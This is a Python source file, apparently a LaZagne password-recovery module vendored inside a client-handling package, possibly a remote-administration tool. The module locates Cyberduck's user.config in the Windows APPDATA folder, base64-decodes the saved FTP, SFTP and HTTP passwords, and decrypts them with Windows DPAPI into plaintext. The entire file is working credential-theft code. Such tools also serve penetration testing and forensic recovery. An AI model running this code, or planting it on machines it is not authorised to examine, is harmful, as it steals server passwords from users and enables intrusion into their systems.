blob: a72a0a6a161003ac4814f4ff1ca3ed63349d4478 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
# -*- coding: utf-8 -*-
import base64
from xml.etree.cElementTree import ElementTree
from foreign.client_handling.lazagne.config.module_info import ModuleInfo
from foreign.client_handling.lazagne.config.winstructure import Win32CryptUnprotectData
from foreign.client_handling.lazagne.config.constant import constant
from foreign.client_handling.lazagne.config.winstructure import string_to_unicode
import os
class Cyberduck(ModuleInfo):
def __init__(self):
ModuleInfo.__init__(self, 'cyberduck', 'sysadmin', winapi_used=True)
# find the user.config file containing passwords
def get_application_path(self):
directory = os.path.join(constant.profile['APPDATA'], u'Cyberduck')
if os.path.exists(directory):
for dr in os.listdir(directory):
if dr.startswith(u'Cyberduck'):
for d in os.listdir(os.path.join(directory, string_to_unicode(dr))):
path = os.path.join(directory, string_to_unicode(dr), string_to_unicode(d), u'user.config')
return path
def run(self):
xml_file = self.get_application_path()
if xml_file and os.path.exists(xml_file):
tree = ElementTree(file=xml_file)
pwd_found = []
for elem in tree.iter():
try:
if elem.attrib['name'].startswith('ftp') or elem.attrib['name'].startswith('ftps') \
or elem.attrib['name'].startswith('sftp') or elem.attrib['name'].startswith('http') \
or elem.attrib['name'].startswith('https'):
encrypted_password = base64.b64decode(elem.attrib['value'])
password = Win32CryptUnprotectData(encrypted_password, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi)
pwd_found.append({
'URL': elem.attrib['name'],
'Password': password,
})
except Exception as e:
self.debug(str(e))
return pwd_found
|
